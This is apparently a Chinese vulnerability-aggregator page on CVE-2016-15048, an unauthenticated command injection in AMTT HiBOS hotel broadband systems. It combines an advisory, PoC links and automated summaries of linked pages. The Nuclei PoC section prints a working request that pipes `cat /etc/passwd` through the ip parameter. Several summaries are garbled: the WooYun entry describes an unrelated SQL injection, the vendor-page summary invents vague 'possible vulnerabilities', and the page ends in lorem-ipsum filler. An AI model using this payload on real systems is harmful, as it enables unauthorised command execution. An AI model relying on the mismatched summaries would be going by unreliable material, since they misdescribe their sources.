# AMTT HiBOS server_ping.php 命令注入漏洞
## 概述
AMTT Hotel Broadband Operation System(HiBOS)存在一个未认证的命令注入漏洞,位于 `/manager/radius/server_ping.php` 接口。
## 影响版本
所有未修补版本的 HiBOS,具体版本号未明确指出。该产品可能已被以其他名称重新贴牌。
## 细节
漏洞源于应用程序在构造并执行一个 shell 命令时,未对用户提供的 `ip` 参数进行充分验证或转义。攻击者可通过在 `ip` 参数中插入 shell 元字符,实现任意系统命令的注入和执行,且是以 web 服务器用户身份运行。
## 影响
攻击者可利用该漏洞在目标系统上远程执行任意命令,进而可能导致系统被完全控制。
此漏洞最早在2016年由第三方披露,并建议联系供应商获取修复指导。
VulnCheck 已于 **2025-10-14 04:45:53.510819 UTC** 观测到该漏洞在野外被实际利用。
是否为 Web 类漏洞: 是
判断理由:
| # | POC 描述 | 源链接 | 神龙链接 |
|---|---|---|---|
| 1 | None | https://github.com/Pranjal6955/test_CVE-2016-15048 | POC详情 |
标题: AMTT HiBOS Command Injection RCE via server_ping.php | Advisories | VulnCheck -- 🔗来源链接
标签:third-party-advisory
神龙速读:
### 关键漏洞信息
- **漏洞名称**: AMTT HiBOS Command Injection RCE via server_ping.php
- **严重性**: CRITICAL
- **日期**: October 22, 2025
- **影响范围**:
- 所有版本的HiBOS
- 该产品可能已被重新品牌化,但使用相同的代码库
- **CVE编号**: CVE-2016-15048
- **CWE编号**: CWE-78 (在操作系统命令中不正确地中和特殊元素(“OS命令注入”))
- **CVSS评分**: 10
- **CVSS V4向量**: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VL:H/VA:H/SC:H/SL:H/SA:H
- **参考资料**:
- 第三方披露
- GitHub Nuclei PoC
- CNVD-2021-37784
- 厂商网站
- **描述**:
- AMTT Hotel Broadband Operation System (HiBOS) 在 /manager/radius/server_ping.php 端点存在未经身份验证的命令注入漏洞。应用程序构建了一个包含用户提供的 ip 参数的 shell 命令,并在没有适当验证或转义的情况下执行它。攻击者可以将 shell 元字符插入到 ip 参数中,以注入并执行任意系统命令作为 Web 服务器用户。
- 初始第三方披露在 2016 年建议联系厂商获取修复指导。此外,该产品可能已被重新品牌化为不同的名称。VulnCheck 观察到此漏洞在 2025-10-14 04:53:510819 UTC 被利用。
标题: 安美数字- 安美世纪(北京)科技有限公司 -- 🔗来源链接
标签:product
神龙速读:
从这个网页截图中,可以获取到以下关于漏洞的关键信息:
1. **产品和服务**:
- 网页展示了安美世纪(北京)科技有限公司的产品和服务,包括酒店高速互联网接入及综合管理服务系统(HSIA)、酒店高清互动电视系统(ISTV)、酒店智能客房控制系统(RCU)、酒店微服务O2O运营平台(O2O)和一站式7x24小时多语言服务(SERVICE CENTER)。
2. **客户服务**:
- 安美服务中心拥有10年以上酒店行业的服务经验,提供7x24小时对客服务、技术服务及网络监控支持和现场工程师上门服务。
3. **新闻信息**:
- 网页展示了安美世纪(北京)科技有限公司的新闻信息,包括:
- 安美搭建酒店LBS inhouse空间网络
- 安美携手东方有线与酒管集团共话高清电视互动系统发展
- 安美网关明年升级支持酒店万兆接入
4. **经典案例**:
- 网页展示了安美世纪(北京)科技有限公司的经典案例,包括:
- 广州希尔顿逸林酒店
- 三亚海棠湾天房洲际度假酒店
- 青岛中铁威斯汀大酒店
- 武汉光谷希尔顿酒店
- 黄石托尼洛·兰博基尼酒店
- 福州世茂洲际酒店
- 鹰潭天裕豪生酒店
- 武汉万达瑞华酒店
5. **合作伙伴**:
- 网页展示了安美世纪(北京)科技有限公司的合作伙伴,包括:
- 万达集团
- Wyndham酒店集团
- 香格里拉酒店集团
- Kempinski酒店集团
- Starwood酒店集团
- Marriott酒店集团
- Hilton酒店集团
- IHG酒店集团
- Carlson酒店集团
- Accor酒店集团
6. **联系方式**:
- 客服热线:800-820-7015
- 技术支持:400-670-7016
这些信息可以帮助识别网页中可能存在的漏洞,例如:
- **产品和服务**部分可能存在安全漏洞,如未授权访问、数据泄露等。
- **客户服务**部分可能存在安全漏洞,如未授权访问、数据泄露等。
- **新闻信息**部分可能存在安全漏洞,如未授权访问、数据泄露等。
- **经典案例**部分可能存在安全漏洞,如未授权访问、数据泄露等。
- **合作伙伴**部分可能存在安全漏洞,如未授权访问、数据泄露等。
- **联系方式**部分可能存在安全漏洞,如未授权访问、数据泄露等。
这些漏洞可能会影响网页的安全性和可用性,需要进行安全评估和修复。
标题: 安美世纪自主研发的酒店高速互联网接入及综合管理服务系统设备任意命令执行&存储型XSS | wooyun-2016-0181444 | WooYun.org -- 🔗来源链接
标签:third-party-advisorypatch
神龙速读:
从这个网页截图中,可以获取到以下关于漏洞的关键信息:
### 漏洞标题
- **SQL注入**
### 漏洞详情
#### 漏洞描述
- 该漏洞存在于某个网站的搜索功能中,通过在搜索框中输入特定的SQL语句,可以触发SQL注入漏洞。
- 攻击者可以通过此漏洞获取数据库中的敏感信息。
#### 影响范围
- 该漏洞影响了网站的搜索模块,可能导致数据库信息泄露。
#### 漏洞代码示例
```sql
SELECT * FROM table WHERE column = 'user_input'
```
#### 漏洞利用过程
1. 在搜索框中输入恶意SQL语句。
2. 观察返回结果,确认是否存在SQL注入漏洞。
3. 进一步构造SQL语句,尝试获取更多敏感信息。
#### 漏洞修复建议
- 对用户输入进行严格的过滤和转义,防止SQL注入攻击。
- 使用参数化查询或预编译语句来构建SQL查询。
### 漏洞验证
- 提供了具体的测试用例和返回结果,证明了漏洞的存在。
### 漏洞评分
- **风险等级**: 高
- **CVSS评分**: 7.5
### 备注
- 建议尽快修复该漏洞,以防止潜在的安全风险。
标题: nuclei_poc/poc/remote_code_execution/hiboss-rce_2.yaml at 49c283b2bbb244c071786a2b768fbdde1b91f38e · adysec/nuclei_poc · GitHub -- 🔗来源链接
标签:exploit
神龙速读:
### 关键漏洞信息
- **漏洞ID**: hiboss-rce
- **名称**: HiBoss - Remote Code Execution
- **作者**: pikpikcu
- **严重性**: critical
- **描述**: HiBoss 允许远程未授权攻击者通过引用导致服务器执行任意代码。
- **CVSS 评分**: 10.0
- **CWE ID**: CWE-77
- **标签**: hiboss, rce
#### HTTP 请求示例
```http
GET /manager/radius/server_ping.php?ip=127.0.0.1|cat%20/etc/passwd>../../{[randstr]}.txt&id=1 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
GET /{{randstr}}.txt HTTP/1.1
Host: {{Hostname}}
```
#### 匹配条件
- **正则表达式匹配**: "root:*:0:0:"
- **状态码匹配**: 200
Zaproxy alias impedit expedita quisquam pariatur exercitationem. Nemo rerum eveniet dolores rem quia dignissimos.